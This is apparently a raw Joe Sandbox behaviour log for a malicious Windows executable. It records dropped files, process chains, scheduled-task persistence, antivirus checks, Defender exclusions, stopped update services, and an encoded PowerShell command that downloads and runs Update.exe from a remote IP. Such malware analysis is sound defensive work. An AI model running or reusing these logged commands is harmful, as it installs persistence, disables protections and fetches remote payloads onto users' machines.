            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\KeywordsCaveJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\ForeignSignsJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\DecCouponJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\BugsTransportationJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\TreatmentsAltoJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\EndingLeadsJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\CollaborationRestrictionJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\GospelDependenceJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\FairlyGeneratingJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\PaidJournalJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_0040497C0_2_0040497C
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_00406ED20_2_00406ED2
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_004074BB0_2_004074BB
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003C81B019_2_003C81B0
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003FA23E19_2_003FA23E
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E228219_2_003E2282
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003DC4DD19_2_003DC4DD
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0044C5CB19_2_0044C5CB
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003C869019_2_003C8690
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043272F19_2_0043272F
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003FE85219_2_003FE852
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042899119_2_00428991
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003F6ABB19_2_003F6ABB
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003C8AF019_2_003C8AF0
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003DCC3E19_2_003DCC3E
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003ECDF019_2_003ECDF0
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0045503319_2_00455033
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003CD08019_2_003CD080
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003F712919_2_003F7129
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E16E419_2_003E16E4
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E1A5619_2_003E1A56
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E7B6B19_2_003E7B6B
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003D9BAD19_2_003D9BAD
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E1D0019_2_003E1D00
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E7D9A19_2_003E7D9A
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003DDFFD19_2_003DDFFD
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E7FF719_2_003E7FF7
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E1FC719_2_003E1FC7
            Source: C:\Windows\System32\dialer.exeCode function: 54_2_00007FF7FB4C232854_2_00007FF7FB4C2328
            Source: C:\Windows\System32\dialer.exeCode function: 54_2_00007FF7FB4C14E454_2_00007FF7FB4C14E4
            Source: C:\Windows\System32\dialer.exeCode function: 54_2_00007FF7FB4C1DB454_2_00007FF7FB4C1DB4
            Source: C:\Windows\System32\dialer.exeCode function: 54_2_00007FF7FB4C26E854_2_00007FF7FB4C26E8
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: String function: 004062A3 appears 58 times
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: String function: 003DFD18 appears 40 times
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: String function: 003E0D80 appears 46 times
            Source: hfi47s4wOT.exeStatic PE information: invalid certificate
            Source: unicodedata.pyd.30.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.34.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: nfngdkpnjkmg.tmp.36.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
            Source: tmpgtnhdrk0.exe.35.drStatic PE information: Number of sections : 11 > 10
            Source: updater.exe.39.drStatic PE information: Number of sections : 11 > 10
            Source: tmp11jjwww2.exe.33.drStatic PE information: Number of sections : 11 > 10
            Source: api-ms-win-core-util-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-localization-l1-2-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-2-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l2-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-namedpipe-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-locale-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-convert-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-conio-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-math-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-interlocked-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-stdio-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-2-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: python3.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-string-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-libraryloader-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-heap-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-rtlsupport-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-profile-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processenvironment-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-environment-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-interlocked-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-time-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-heap-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-filesystem-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-runtime-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-handle-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-process-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-sysinfo-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-utility-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-memory-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-string-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-1.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-util-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-convert-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-2-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-locale-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l2-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-localization-l1-2-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-conio-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-timezone-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-namedpipe-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-rtlsupport-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-stdio-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-libraryloader-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-math-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-2-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: python3.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-string-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-heap-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-utility-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-string-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processenvironment-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-environment-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-timezone-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-memory-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-time-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-filesystem-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-heap-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-handle-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-process-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-runtime-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-sysinfo-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-1.dll.34.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-profile-l1-1-0.dll.30.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.34.drStatic PE information: No import functions for PE file found
            Source: hfi47s4wOT.exe, 00000000.00000003.1614139847.00000000028E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeP vs hfi47s4wOT.exe
            Source: hfi47s4wOT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.evad.winEXE@102/187@1/1
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00433F24 GetLastError,FormatMessageW,19_2_00433F24
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_004217A1 AdjustTokenPrivileges,CloseHandle,19_2_004217A1
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00421DA5 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_00421DA5
            Source: C:\Windows\System32\dialer.exeCode function: 54_2_00007FF7FB4C2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,54_2_00007FF7FB4C2328
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042DAC1 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,19_2_0042DAC1
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00433738 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,19_2_00433738
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeFile created: C:\Program Files\Google\Chrome\updater.exe
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifFile created: C:\Users\user\AppData\Local\MindZenith Innovations CoJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2032:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Users\user\AppData\Local\Temp\nsxE9A7.tmpJump to behavior
            Source: hfi47s4wOT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile read: C:\Users\user\Desktop\hfi47s4wOT.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\hfi47s4wOT.exe "C:\Users\user\Desktop\hfi47s4wOT.exe"
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Returning Returning.cmd & Returning.cmd & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 287175
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "COALITIONFIBERRELPASTE" Gays
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Yoga + Sail 287175\B
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif Surrey.pif B
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "MindZenithPro" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc onlogon /F /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g"
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe "C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe"
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe "C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe"
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
